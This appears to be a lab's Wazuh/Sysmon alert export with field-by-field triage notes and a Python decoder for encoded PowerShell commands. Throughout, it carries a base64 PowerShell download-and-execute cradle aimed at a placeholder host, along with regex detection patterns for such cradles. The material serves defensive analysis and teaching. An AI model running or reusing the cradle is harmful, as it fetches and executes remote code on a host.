ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:24.351 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce8-680a-e30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2804 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 36 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1175115 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:27.2071521Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282794 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity level (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:27.162
ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00}
ProcessId: 14284
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vr2cdhun.rr0.ps1
CreationUtcTime: 2025-04-24 22:36:27.160
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:27.162 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce8-680a-e30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vr2cdhun.rr0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:27.160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1177884 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. It is Sysmon, so read eventID with the Sysmon event table, not the Security-log one.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. Filter on it when you want every Sysmon event regardless of how the provider name is rendered.
data.win.system.eventID: 1 Sysmon Event ID: 1 = Process Create. Not a classic Security-log ID such as 4624 or 4688, which live in the Security channel.
data.win.system.version: 5 Schema version of this event type; Sysmon raises it when it adds fields to the event (ParentUser, for instance, was a later addition).
data.win.system.level: 4 Event level: 4 = Informational (2 Error, 3 Warning). Sysmon writes everything at 4, so the level carries no severity signal.
data.win.system.task: 1 For Sysmon the task number mirrors the event ID; it is not a Security-log category such as Logon or Policy Change.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; this value is the reserved channel bit every event on this channel carries, so it is no use as a filter here.
data.win.system.systemTime: 2025-04-24T22:36:29.5433971Z When the event was written to the log. The process actually started at eventdata.utcTime (22:36:28.213), about 1.3 s earlier; build timelines from utcTime.
data.win.system.eventRecordID: 282818 Incremental log record number – handy for timeline order and for counting how many events fell between the alerts you were shown.
data.win.system.processID: 3712 PID of the process that wrote the event, i.e. the Sysmon service, not the process being reported. It is 3712 in every alert on this page.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent read this from. Sysmon has its own channel, separate from Security and System.
data.win.system.computer: Attacker Computer name stamped on the event by the event log; normally equals agent.name, and a mismatch is worth a question.
data.win.system.severityValue: INFORMATION Text rendering of level (INFORMATION, WARNING, ERROR); same caveat as level.
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:28.213
ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00}
ProcessId: 1468
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00}
ParentProcessId: 14284
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" The message as rendered by Windows. The same fields are parsed into data.win.eventdata.* below, which is what the rules match on.
data.win.eventdata.utcTime: 2025-04-24 22:36:28.213 When the process was created, per Sysmon. Use this, not system.systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-bcec-680a-e50a-000000000e00} Sysmon's unique process identifier; unlike a PID it is never reused. Join key for every later event from this process, including the FileCreate alert that follows.
data.win.eventdata.processId: 1468 Windows PID. Reused after the process exits, so pivot on processGuid, not on this.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable: the stock Windows PowerShell 5.1 location.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource from the PE; 10.0.26100 is a Windows 11 24H2 / Server 2025 build.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource. Trivial to fake in an unsigned binary, so a hint, not proof.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the version resource. Compare with the file name in image: a mismatch means a renamed binary.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. -NoLogo -NoProfile -EncodedCommand followed by a base64 blob is the classic fingerprint of hidden PowerShell; the blob is UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. Note powershell.exe appears twice and the parent's command line below is identical, so each instance launches the next.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root here.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (COMPUTER\user for a local account, DOMAIN\user when domain-joined).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Identifies the logon session; every process in this chain shares it.
data.win.eventdata.logonId: 0x26584 Logon session ID. Correlate with Security event 4624 to learn how and from where the user logged on.
data.win.eventdata.terminalSessionId: 1 Windows session number. 1 is an interactive desktop session; 0 is where services run.
data.win.eventdata.integrityLevel: Medium Medium = standard, non-elevated user. High would mean an elevated (admin) token, System a service.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file, algorithms per the Sysmon config (SHA256 only here). Use it to confirm the binary is the stock one and to pivot across hosts.
data.win.eventdata.parentProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} Sysmon GUID of the parent. The Process Create whose processGuid equals this is the next step up the tree.
data.win.eventdata.parentProcessId: 14284 PID of the parent process.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent. powershell.exe spawning powershell.exe is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's full command line. Identical to commandLine, so the parent was launched the same way.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. A change between parent and child user would indicate impersonation or elevation; none here.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
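The encoded command is the one part of this alert an analyst cannot read by eye. The following Python is an added example, not part of the Wazuh alert or of any Wazuh or Sysmon tooling: it pulls the -EncodedCommand token out of a Sysmon command line (accepting the -e/-ec/-enc prefixes powershell.exe allows), decodes the base64 as UTF-16LE rather than UTF-8, and reports the download cradle, the embedded URL and the doubled powershell.exe. The sample command line is constructed from the alert above; the function names are this example's own.

```python
import base64
import re

# Constructed sample: the commandLine value from the Sysmon Process Create
# alert above (the base64 is copied verbatim from that alert).
SAMPLE_CMDLINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...) and attackers use all of them, so match every prefix, longest first.
_ENC_FLAG = re.compile(
    r"-(?:" + "|".join("encodedcommand"[:i] for i in range(14, 0, -1)) + r")"
    r"\s+['\"]?([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
# IEX / Invoke-Expression fed by a network fetch: the download-cradle shape.
_CRADLE = re.compile(
    r"\b(?:IEX|Invoke-Expression)\b.*?"
    r"(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|Invoke-RestMethod|WebClient|\bIWR\b|\bIRM\b)",
    re.IGNORECASE | re.DOTALL,
)
_URL = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def extract_encoded_command(cmdline: str):
    """Return the base64 token following -EncodedCommand (or a prefix), else None."""
    m = _ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(token: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE, not UTF-8."""
    token += "=" * (-len(token) % 4)  # tolerate padding stripped by a copy/paste
    return base64.b64decode(token, validate=True).decode("utf-16-le")


def analyze_commandline(cmdline: str) -> dict:
    """Decode if needed, then pull out the facts an analyst wants at triage."""
    token = extract_encoded_command(cmdline)
    decoded = decode_encoded_command(token) if token else None
    script = decoded if decoded is not None else cmdline
    return {
        "encoded": token is not None,
        "decoded": decoded,
        "download_cradle": bool(_CRADLE.search(script)),
        "urls": _URL.findall(script),
        # powershell.exe named twice on one command line; in the alert above the
        # parent carries the identical line, so each instance launches the next.
        "image_repeated": len(re.findall(r"powershell\.exe", cmdline, re.IGNORECASE)) > 1,
    }


if __name__ == "__main__":
    for key, value in analyze_commandline(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Run against the sample, the decoded script is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): the host is being told to fetch and run remote code, the URL is the pivot, and that is why the 92057 alert is the one worth acting on in this group.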
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Read it with care here: the "executable" is a .ps1 that PowerShell itself writes to %TEMP% on every start (see targetFilename below), so the headline overstates what happened.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast. The mapping comes from the rule, not from this file: judge T1105 from the encoded command in the Process Create alert, not from this FileCreate.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 37 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1185951 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: Sysmon again, so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID; filter on it to catch every Sysmon event.
data.win.system.eventID: 11 Sysmon Event ID: 11 = FileCreate, logged when a file is created or overwritten. Not a classic Security-log ID.
data.win.system.version: 2 Schema version of the FileCreate event type.
data.win.system.level: 4 Event level: 4 = Informational. Sysmon writes everything at 4, so the level carries no severity signal.
data.win.system.task: 11 For Sysmon the task number mirrors the event ID; it is not a Security-log category.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; the reserved channel bit every event on this channel carries, so no use as a filter here.
data.win.system.systemTime: 2025-04-24T22:36:29.7188541Z When the event was written to the log, about 20 ms after the file creation recorded in eventdata.utcTime.
data.win.system.eventRecordID: 282819 Incremental log record number. Directly follows the Process Create above (282818): Sysmon logged nothing else between that process starting and this file write.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not the process that created the file (that is eventdata.processId).
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent read this from.
data.win.system.computer: Attacker Computer name stamped on the event; should match agent.name.
data.win.system.severityValue: INFORMATION Text rendering of level (INFORMATION, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:29.700
ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00}
ProcessId: 1468
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_eamq14se.2pz.ps1
CreationUtcTime: 2025-04-24 22:36:29.700
User: Attacker\Attcker1" The message as rendered by Windows. The same fields are parsed into data.win.eventdata.* below, which is what the rules match on.
data.win.eventdata.utcTime: 2025-04-24 22:36:29.700 When the file was created, per Sysmon; 1.5 s after the process in the alert above started.
data.win.eventdata.processGuid: {94294ddc-bcec-680a-e50a-000000000e00} Sysmon GUID of the process that wrote the file. It equals the processGuid of the Process Create alert directly above, so this file belongs to that encoded PowerShell.
data.win.eventdata.processId: 1468 PID of the writing process. PIDs get reused, so join on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_eamq14se.2pz.ps1 Path of the created file. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell itself at start-up to test whether AppLocker/WDAC restricts scripts; it is not a dropped payload and is a well-known false positive for "file in Temp" rules. The interesting event is the Process Create it belongs to, not this one.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:29.700 Creation timestamp on the file. Equal to utcTime for a brand-new file, as here; an older value means an existing file was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account that wrote the file.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Accurate here: parentImage and image are both powershell.exe and commandLine carries -EncodedCommand; the decoded blob is a download cradle (see commandLine below).
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 34 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534223.1188716 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event: Sysmon, so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID; filter on it to catch every Sysmon event.
data.win.system.eventID: 1 Sysmon Event ID: 1 = Process Create. Not a classic Security-log ID such as 4624 or 4688.
data.win.system.version: 5 Schema version of the Process Create event type.
data.win.system.level: 4 Event level: 4 = Informational. Sysmon writes everything at 4, so the level carries no severity signal.
data.win.system.task: 1 For Sysmon the task number mirrors the event ID; it is not a Security-log category.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; the reserved channel bit every event on this channel carries, so no use as a filter here.
data.win.system.systemTime: 2025-04-24T22:36:32.1375533Z When the event was written to the log. The process started at eventdata.utcTime (22:36:30.544), about 1.6 s earlier; build timelines from utcTime.
data.win.system.eventRecordID: 282849 Incremental log record number. 29 Sysmon events were logged between the FileCreate above (282819) and this one without raising alerts; pull them by record ID if you need the full story.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not the process being reported.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent read this from.
data.win.system.computer: Attacker Computer name stamped on the event; should match agent.name.
data.win.system.severityValue: INFORMATION Text rendering of level (INFORMATION, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:30.544
ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00}
ProcessId: 11608
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
